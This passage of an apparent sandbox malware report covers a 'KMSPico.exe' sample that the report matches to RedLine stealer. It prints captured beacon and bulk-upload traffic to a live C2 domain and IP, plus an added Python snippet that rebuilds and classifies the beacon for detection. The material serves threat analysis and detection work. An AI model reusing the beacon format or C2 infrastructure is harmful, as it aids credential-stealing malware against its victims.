                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 7086
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:59 UTC  7086               OUT        Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:48:00 UTC  806                IN         HTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:48:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=132oosr83gmsme7lob4posfuo0; expires=Sun, 23-Jun-2024 18:34:38 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RNKmnAm7DZxuIMNcVi0K7d1R2%2FaYVl5L%2FNOVnOv%2B1RSYjpcDxvAZtpaimVZwy2LcdNEJAjyDeIetja6GW%2BGH2ACEVlRCjeidwHRxbJxnpDZsxjheneWzYp0sBC1ZrbIzL9gtQOCn63Fo"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce62ded4b6a50-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:48:00 UTC  23                 IN         Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:48:00 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                    6           192.168.2.5  49710        104.21.80.118   443               3648  C:\Users\user\Desktop\KMSPico.exe
                                    Timestamp                Bytes transferred  Direction  Data
                                    2024-02-29 00:48:00 UTC  287                OUT        POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 1256
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:48:00 UTC  1256               OUT        Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:48:00 UTC | 806 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:48:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=aft6olj77m8001fl6bus80qes0; expires=Sun, 23-Jun-2024 18:34:39 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BKNVXg92ou38rtRSp8lrFw6eEFzFmzLSIGFWHhucK8RvAi%2BNTKytjZwPO13N%2FZv02CMQRVfjrGIIc0Ghi9cLhM2DSAUl08aRygXM0Gz2OlKHbGVcd%2BQOu1SEfEEGvc5yuR4iy9QK5C65"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce632cc2a435c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:48:00 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215 (chunked encoding: chunk size 0x11 = 17 bytes, chunk body "ok 191.96.227.215")
                                    2024-02-29 00:48:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0 (zero-length terminating chunk)


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    7 | 192.168.2.5 | 49711 | 104.21.80.118 | 443 | 3648 | C:\Users\user\Desktop\KMSPico.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2024-02-29 00:48:01 UTC | 289 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 591913
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:48:01 UTC | 15331 | OUT | Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii (CRLF bytes 0d 0a rendered as line breaks):
                                    --be85de5ipdocierre1
                                    Content-Disposition: form-data; name="hwid"

                                    827B3A9866A9950B05ED7E0AF538F2C5
                                    --be85de5ipdocierre1
                                    Content-Disposition: form-data; name="pid"

                                    1
                                    --be85de5ipdocierre1
                                    Content-Disposition: form-data; name="lid"

                                    Tzp2cq--KMS
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: cc 6a 7f a1 c1 56 04 1b 8b 28 96 ec bf a0 03 46 7a cd 0d d6 9c 65 1d 32 f5 3d 50 ac af ed 32 97 00 c3 64 1f d8 18 f8 c5 18 3d 89 e2 a7 f9 fa 23 2e 6a a6 12 25 a1 ef 3b e6 26 3c 5a 13 35 f7 ea 7f 2b 33 4f 12 81 29 4f 08 99 df 2c 19 cc 8f db a2 20 af 0f a8 43 ad ca 33 9a 16 08 8a e2 af 6b 1e 55 62 39 2e 8e 36 79 11 7a 99 ac 6d 58 61 49 a0 12 11 f6 09 64 f8 ae f5 95 5c 03 8c 81 ea 04 c9 c3 b0 b6 c6 b7 28 79 56 2d 8a 70 78 c1 51 1e 7d f1 9d 63 ab 6c 6f ce 0c 7a 96 16 07 8d 7f 20 33 b8 bf 16 18 fb 99 6d df 13 0c 47 09 9d 6e c5 d0 57 e1 1c 4f 7b 41 e0 3b 96 ee e0 76 52 fd e4 09 36 ff 6b 1f 33 f8 68 b7 27 75 66 85 25 7a 76 78 a1 f2 a0 a0 dc bb 96 2f 00 05 e1 54 41 71 46 c2 59 c7 54 7c 8e 26 f4 5a b6 d9 12 98 f5 28 c2 c3 8e 33 7c 57 c5 85 2e 3f 3a 16 be 27 8a 3f
                                    Data Ascii: jV(Fze2=P2d=#.j%;&<Z5+3O)O, C3kUb9.6yzmXaId\(yV-pxQ}cloz 3mGnWO{A;vR6k3h'uf%zvx/TAqFYT|&Z(3|W.?:'?
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 6d 8c 3c 9d 4f 88 a7 fa e2 be 2b 66 92 2f 85 74 41 88 59 42 f0 00 90 e9 fe b0 99 fd 61 7b 64 38 11 94 e7 01 0b e7 6a 0d 9a b4 f7 72 5f 73 7e 54 10 51 e2 8d 73 47 9b 50 f1 4d c3 d2 ad c6 bf f4 65 c6 af 9e d7 46 66 a9 62 f5 eb dc f3 3b d5 d0 ff d1 ec fb ee d5 bc 25 14 20 89 dc 22 7f 23 5a f0 86 45 bb 44 08 49 f1 90 c3 29 99 1c 4d e0 51 1b 8d 08 70 ed fe d6 d7 9c 8f 14 0a 25 75 e8 dd 2e b2 86 ab ab e0 89 cb 1a 23 00 aa 61 ba cc 36 5a 9a b9 38 57 12 f1 1e 27 6f d9 0c f4 48 dd b6 b6 ce 99 7b 8b dd 81 a5 27 49 c2 16 72 68 91 9e 50 a4 cd 46 32 a1 99 ab df f5 69 8f c2 49 c4 31 91 da dc 99 63 46 64 a4 c5 50 a6 d7 8b f2 58 8f 00 7d d7 a1 6d ea b8 cd 5c fe f4 4a 7e 65 ea 4d eb ef 6d 35 6b 9c d9 b1 e4 5b 7e 47 07 7d 1e f0 7e cd 85 ce cd a6 06 d6 44 87 9d d4 c5 21 49
                                    Data Ascii: m<O+f/tAYBa{d8jr_s~TQsGPMeFfb;% "#ZEDI)MQp%u.#a6Z8W'oH{'IrhPF2iI1cFdPX}m\J~eMm5k[~G}~D!I
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 65 29 e1 8e 8d 54 bb 35 32 45 04 18 e3 c2 74 db e6 7f 4d 4f e4 d7 23 53 de be 33 e8 e1 8a 8c 6b b0 f1 4e d4 e5 59 da f7 ff dd 62 24 00 4a 04 fe dc 2e a0 05 7a 84 d9 f1 a6 74 0d 43 30 eb 7f 86 98 0d 34 51 3b 16 bb 81 97 18 d7 7b 3f cc 09 05 dc 6f fe b2 f8 e1 2a c0 b9 7e b7 28 3f c7 1c 62 d2 c3 12 27 40 5b 44 f5 55 40 6b d9 b1 2f a5 86 9b a8 44 47 88 0b 4e 6b cd 19 80 43 c0 54 19 b5 73 99 60 2b 17 81 3c 54 f4 58 2a 22 e0 35 ee d1 0b 2c 8c ae ac da 82 53 18 47 96 c0 40 e7 6f 4b 90 93 29 62 19 c0 f7 f7 77 90 99 3f 35 cb 0b 3d bc c5 24 13 6a 6c e7 51 bc dc f4 30 20 c0 f0 2e dd b2 11 f1 b7 52 2c 9b 25 54 e0 c3 21 04 6f 91 03 1b 4a 62 5e 08 d0 99 47 82 e4 94 aa 8f 80 1c 62 52 5b db 57 d8 09 93 a6 3b 4b 1b 73 e2 9d c4 97 71 85 d0 14 10 f4 b5 bd ba 7e 08 e3 75 61
                                    Data Ascii: e)T52EtMO#S3kNYb$J.ztC04Q;{?o*~(?b'@[DU@k/DGNkCTs`+<TX*"5,SG@oK)bw?5=$jlQ0 .R,%T!oJb^GbR[W;Ksq~ua
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 5a 86 d8 24 e1 36 61 51 62 1c b0 19 ad 2e 41 1c 77 a4 40 a2 52 ac f3 3c b1 a2 c7 c1 b5 42 08 b6 9d b2 15 ad e9 19 39 c9 00 26 b5 f6 d9 80 3a c5 b1 26 32 ff 56 18 de df cc d3 1b ea 26 f7 17 13 fd 38 e7 fc 31 7d e3 c4 84 a1 69 55 93 0a f9 5b c3 d1 03 41 59 8d bf 6c 83 30 8a f2 35 59 c8 bd fe b0 98 4b 91 c5 09 a5 4f cb d7 30 9b 1d bd a4 d4 50 73 51 d7 00 54 5f 29 8d 7b 41 7a a9 58 d8 08 66 88 a4 e8 5c f5 14 38 8e d9 29 42 44 09 9b 79 4b b6 7a f2 75 85 1e 5e 2d 5c 9b 70 ec ce 4a d8 e5 99 66 4f da 10 e5 f4 7a 68 84 2b f6 47 2a 96 23 3f 90 64 a2 d1 80 66 0d 1c 9e 15 7e b2 6d 32 01 aa 9c 9d 4b c8 b8 f4 88 e3 4f a3 c6 ee ed df 97 26 17 57 16 de d6 b6 63 99 de a3 99 7b 62 6f 9f ea c0 31 25 df ab 97 f6 1e d5 7a 72 8d 5b ac 46 9f 16 3e 47 62 1e 87 28 57 80 cf 0b 38
                                    Data Ascii: Z$6aQb.Aw@R<B9&:&2V&81}iU[AYl05YKO0PsQT_){AzXf\8)BDyKzu^-\pJfOzh+G*#?df~m2KO&Wc{bo1%zr[F>Gb(W8
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 9e b3 b8 09 5e 4f 57 4f 0c eb 1d 00 74 0e 6f e8 14 5d 91 48 4f e7 ae 2c f8 1b 89 2c 96 e6 6d 0c ab 08 2c 7d f6 de 9a 65 55 de 91 4f d8 23 06 9a a4 22 d4 7c a9 21 60 8b 48 26 d1 48 30 59 92 31 e3 2d 2e 63 fb e2 c6 b5 9a 5d 07 aa ef 9c 3a 86 57 4f d1 b7 01 f4 91 9b 8a d3 62 20 94 cb 1c 6e e9 74 ff c2 cd 7f 7b 09 fe 5a 1a c4 ec b9 9d 84 a6 dd 25 6f f7 fb db 83 cf 27 60 77 6c 9f 35 c6 b9 49 4a a1 d6 8f 54 57 29 01 9a df 29 53 04 12 4b 61 a4 be 62 57 e8 a9 f3 fe 02 20 88 0f c5 84 40 c5 5d 40 f9 42 f4 9c cc fe 36 2d 05 a4 be 82 99 7d ac 1f 11 f0 c7 98 02 0c 1f 94 bd 4b 0e 61 11 e1 46 22 93 d7 87 1c f6 2e bf e2 15 be 12 15 76 7c 69 f8 e2 85 c3 4c 0d ab 1d d7 ba 1e 82 b4 62 9c ab 44 4f 7d 84 b2 ef ca 53 63 da 3d 4a bd 83 2c 68 6a 12 28 2f 81 38 72 58 65 8b ad 9b
                                    Data Ascii: ^OWOto]HO,,m,}eUO#"|!`H&H0Y1-.c]:WOb nt{Z%o'`wl5IJTW))SKabW @]@B6-}KaF".v|iLbDO}Sc=J,hj(/8rXe
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: b5 89 79 7e 02 8b bd ce a9 86 77 20 22 47 f6 82 4c 8c 2a 4c e8 02 28 08 e2 03 fa 0f 80 8d e5 fc 93 db 39 10 65 d2 90 f6 e5 0e 34 14 89 86 75 f7 c7 02 53 52 e9 ca 59 5e c0 68 a0 c7 cb 1d 01 1b c9 33 19 d3 8f d8 5f ef 7a 6a 62 23 7d 70 fb f1 18 8c 82 7d 4f 42 50 0a 37 a5 bf 56 b6 1c fd d5 a3 89 fc fe 04 ab e5 67 45 d0 f9 3f 68 da c5 31 1a 92 42 93 1f 1f 01 3d 1a 44 9d 8b 20 5f 10 83 98 75 1b 18 98 7f fb 02 b6 3e 14 86 fc 6b 4e ba c6 ae db a8 b0 77 98 37 48 f9 d1 0c 3a 70 9e b5 d8 1e 5d 20 a8 0b f6 a9 43 e7 f0 27 cc 09 37 ec 60 39 6e 91 16 88 46 ed 22 dc 00 f9 6e e3 0e 2e 3c 69 be 3c 62 eb 51 03 11 f0 3d 3d 86 c5 15 aa fb 6c 77 e9 46 c7 52 66 1b 25 a4 aa 15 0a 58 da 3a 7d 2b 5a 8f 3b b9 51 f0 8d e8 c3 8f 9a af 5e 4a 94 16 df 8d df c9 42 2c d7 de e7 0b 97 45
                                    Data Ascii: y~w "GL*L(9e4uSRY^h3_zjb#}p}OBP7VgE?h1B=D _u>kNw7H:p] C'7`9nF"n.<i<bQ==lwFRf%X:}+Z;Q^JB,E
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: eb a1 65 85 76 67 c5 de a9 b2 ec 38 28 73 35 48 6a 7a ea b4 71 0d 09 c1 52 2e 07 15 61 35 74 ba 7c 02 39 01 24 08 93 69 e5 b3 ad 41 a7 7e 56 1d dc a1 40 57 9c 17 47 dd 3e 17 83 22 f1 6b a1 2e 49 d4 4c 58 79 a3 ad 93 01 d1 91 80 e0 6e 86 8e 06 be 3b 12 2e 26 bf 49 79 ce ce dc a5 3c 2d 88 61 a1 17 ad 1a 33 35 91 1f 34 21 c5 73 f4 11 6e 05 b7 8c db 9c 55 aa 88 76 8d ba ff ad 22 68 07 e6 8d 40 5b c3 e3 da 59 12 6c a4 ce 25 e2 ae bb c9 dc 31 0a d7 37 0b 85 56 89 39 9f 30 91 35 29 8e bc b3 9e 17 70 b6 08 ae 1c d2 a7 f4 45 04 52 75 74 f8 bd 7e 7a c7 89 64 02 e2 b0 a9 ad b4 4a 19 6a 46 a2 c3 eb 2c 71 30 e4 11 60 be 8e af 9b 25 85 1b 91 8f cd 3b 1e c4 29 44 fb 28 8a 8d f6 d6 db cb a3 8b 45 af 0e 7d c9 25 eb af b4 98 45 ae 55 84 9e 79 5d ca bf 82 9b 02 bf 27 fb 4c
                                    Data Ascii: evg8(s5HjzqR.a5t|9$iA~V@WG>"k.ILXyn;.&Iy<-a354!snUv"h@[Yl%17V905)pERut~zdJjF,q0`%;)D(E}%EUy]'L
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: f6 b4 de f1 1c a7 2f 43 19 3f 4f 1d aa b6 19 fb 0b e3 c7 8d af 6b bc e3 33 c1 7a 8b b9 1a 7b 67 7e 65 81 46 41 cf df 67 3f ed 7d 79 b3 12 bd e0 d0 b7 f9 ba 5f cf f5 e0 73 83 db ff de b9 24 97 36 78 88 bb 87 b8 f5 6f 91 2a f4 c7 04 de 14 61 ea 83 64 5d 02 d9 f2 1c f2 45 90 a7 ed f0 92 e5 73 84 75 45 d0 4d fb 25 a2 1e 1f e5 c6 4a c4 4a 82 8b fa 4e 34 3b 71 e6 eb 91 d6 52 ce 79 96 b7 f0 e0 d4 69 03 09 b2 4a 5f 72 a7 64 55 8a e6 53 57 95 6a 86 84 2f 33 4c e5 6b 60 70 f6 7c 00 0e db d9 30 46 9b 13 10 a0 aa 15 e1 65 d2 9c 43 1d 46 16 0b ff fa 75 5d f2 bf 43 f4 8a 0f 93 89 b1 66 29 8c 41 6b 03 a6 31 60 2c 18 32 7c 9e 4f ec 0c b3 10 02 0d fc 1c 1f 69 b0 16 64 a3 d1 a2 7c 81 e2 79 36 b2 07 4d b5 b7 82 18 f5 9d ff 65 e9 64 6a 4a 78 a3 22 e4 94 2a e5 da 0f 80 cf 8f
                                    Data Ascii: /C?Ok3z{g~eFAg?}y_s$6xo*ad]EsuEM%JJN4;qRyiJ_rdUSWj/3Lk`p|0FeCFu]Cf)Ak1`,2|Oid|y6MedjJx"*
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 5c f7 2b cd 9e 5b 93 36 e1 3a e8 ba ac 57 84 30 c3 40 d7 0c d3 dd 8a 85 25 32 81 17 7c f3 f3 95 67 75 1c 4d 19 1e 86 0d ff 25 b9 bf d2 28 ce 39 2a f5 10 9e cf ea 78 ad 2a 52 b2 31 83 e2 69 d9 7f 1d 2f f1 a1 66 0e 47 4a da 54 ea 00 7c e7 8e 8a 8e fc 67 15 a1 88 78 f4 92 46 79 fe f8 93 22 1c 8d 43 f6 53 1a cc 16 05 40 89 74 8f 5d 72 58 71 e9 c6 9a 92 ed 97 03 2e 49 fa 58 0b b7 76 b4 d2 3f f8 59 2d 76 5d e2 43 5b 4c 0a 6c c9 9a b3 57 0f 8c 74 30 be f4 fb ea cd 3d 39 f5 ab 6a 65 31 a9 7d 31 48 78 81 b9 90 b9 c7 3c 4f 42 b1 d2 52 84 56 61 25 ce 3b ab 3b 32 f7 f5 8d b4 73 a1 d5 56 b3 64 f9 72 72 a7 8f 99 ce af 16 bf 81 ec 85 c2 d5 2c ba 77 6c 27 c3 2a 35 fe 56 d0 d7 0f c1 eb 25 fb 6c 6d ba b7 56 9f 6d 24 86 cc fd 62 2c f1 0a 32 e5 4c c3 1d ee 8e 67 70 07 b2 3d
                                    Data Ascii: \+[6:W0@%2|guM%(9*x*R1i/fGJT|gxFy"CS@t]rXq.IXv?Y-v]C[LlWt0=9je1}1Hx<OBRVa%;;2sVdrr,wl'*5V%lmVm$b,2Lgp=
                                    2024-02-29 00:48:03 UTC | 810 | IN | HTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:48:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=4f30vjsafuiq3iqip44taj0bkd; expires=Sun, 23-Jun-2024 18:34:42 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mi%2BR4IG5Y6z%2FUFiMLd6BDNtWMfLc3benP6TxfZxC%2Bq26D2kZ5hbrPwcT8RXzpCcoqVGa0tBX6%2FrJtNdot6e3vm%2B%2F9gALwvMqXUQCOEPAiDTcZd9vqjw4h7CFVJ0jIxA4M2Yhp1FkBUm4"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce63a3cb90ced-EWR
                                    alt-svc: h3=":443"; ma=86400
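Sessions 6 and 7 above are the sample's two POSTs to /api on technologyenterdo.shop (Cloudflare-fronted, 104.21.80.118): a small check-in carrying hwid, pid and lid form fields, answered with a chunked "ok 191.96.227.215", and a 591913-byte follow-up that repeats the same three fields before a large non-text payload. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It reconstructs the check-in body from the captured bytes, parses the multipart fields, decodes the chunked reply, and classifies a request by that field shape. The closing "--boundary--" line, the "checkin"/"upload" labels, the 64 KB size threshold and the HttpRequest container are assumptions; the report prints only the first bytes of each body, so the declared Content-Length (1256 and 591913) is used as the size signal, and nothing is claimed about what pid or lid mean beyond their names.

```python
import re
from dataclasses import dataclass


@dataclass
class HttpRequest:
    """Minimal container for one captured request (assumed shape, not the report's)."""
    method: str
    path: str
    headers: dict
    body: bytes


BOUNDARY = "be85de5ipdocierre1"          # from the Content-Type header in sessions 6 and 7
DELIM = b"--" + BOUNDARY.encode()


def form_part(name: str, value: bytes) -> bytes:
    """One multipart/form-data part in the layout the hex dump shows."""
    return DELIM + b'\r\nContent-Disposition: form-data; name="' + name.encode() + b'"\r\n\r\n' + value + b"\r\n"


# Reconstructed from the session 6 hex dump; the report truncates bodies, so the
# closing "--boundary--" line is an assumption.
CHECKIN_BODY = (
    form_part("hwid", b"827B3A9866A9950B05ED7E0AF538F2C5")
    + form_part("pid", b"1")
    + form_part("lid", b"Tzp2cq--KMS")
    + DELIM + b"--\r\n"
)
# The two IN rows of session 6 (23 + 5 bytes): one 0x11-byte chunk, then the terminator.
C2_REPLY = b"11\r\nok 191.96.227.215\r\n0\r\n\r\n"


def boundary_of(content_type: str):
    """Boundary parameter of a multipart Content-Type value, or None."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    return m.group(1) if m else None


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Map each form-data part name to its raw value; stops at the closing delimiter."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:          # [0] is the preamble before the first delimiter
        if part.startswith(b"--"):               # "--boundary--" ends the body
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                             # truncated part without a header/body split
        m = re.search(rb'name="([^"]+)"', head)
        if m:
            fields[m.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def decode_chunked(raw: bytes) -> bytes:
    """Join the data chunks of a Transfer-Encoding: chunked body (trailers not handled)."""
    out, pos = b"", 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # hex chunk size; ignore chunk extensions
        if size == 0:
            return out
        out += raw[eol + 2:eol + 2 + size]
        pos = eol + 2 + size + 2                     # skip the CRLF after the chunk data


BEACON_FIELDS = {"hwid", "pid", "lid"}
HWID_RE = re.compile(rb"\A[0-9A-F]{32}\Z")           # 32 upper-case hex digits, as captured
UPLOAD_MIN_BYTES = 64 * 1024   # assumption: separates the ~1 KB check-in from the 591913-byte POST


def classify(req: HttpRequest) -> str:
    """Return 'checkin', 'upload' or 'none' for one request (labels assumed, not the malware's)."""
    if req.method != "POST" or req.path != "/api":
        return "none"
    ctype = req.headers.get("Content-Type", "")
    boundary = boundary_of(ctype)
    if not ctype.startswith("multipart/form-data") or boundary is None:
        return "none"
    fields = parse_multipart(req.body, boundary)
    if not BEACON_FIELDS.issubset(fields) or not HWID_RE.match(fields["hwid"]):
        return "none"
    declared = int(req.headers.get("Content-Length", len(req.body)))
    return "upload" if declared >= UPLOAD_MIN_BYTES else "checkin"


def captured_request(content_length: int, body: bytes) -> HttpRequest:
    """Request with the headers seen in sessions 6 and 7."""
    return HttpRequest("POST", "/api", {
        "Connection": "Keep-Alive",
        "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
        "Content-Length": str(content_length),
        "Host": "technologyenterdo.shop",
    }, body)


CHECKIN_REQUEST = captured_request(1256, CHECKIN_BODY)
# Session 7 repeats the three fields and then sends ~578 KB the report truncates;
# only its declared length is reproduced here.
UPLOAD_REQUEST = captured_request(591913, CHECKIN_BODY)

if __name__ == "__main__":
    for session, req in (("session 6", CHECKIN_REQUEST), ("session 7", UPLOAD_REQUEST)):
        print(session, classify(req), parse_multipart(req.body, BOUNDARY))
    print("C2 reply:", decode_chunked(C2_REPLY))
```

The classifier deliberately ignores the User-Agent: the sample sends a stock Chrome/119 string, so matching on it would flag real browsers. The field shape (hwid/pid/lid multipart to /api) together with the low-reputation host and the JA3 fingerprint the report flags is the better pivot; the "ok <IPv4>" reply shape is a second, response-side check for the same session.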


                                    [Graphs not reproduced: per-process CPU load (0-100 %) and memory use (0-40 MB) over the first 100 s of the run, and the File / Registry behaviour distribution per process]

                                    Target ID:0
                                    Start time:01:47:48
                                    Start date:29/02/2024
                                    Path:C:\Users\user\Desktop\KMSPico.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\KMSPico.exe
                                    Imagebase:0x400000
                                    File size:287'744 bytes
                                    MD5 hash:E46FCDE17771922059B7A826EC4E4CA3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2258987153.000000000252F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
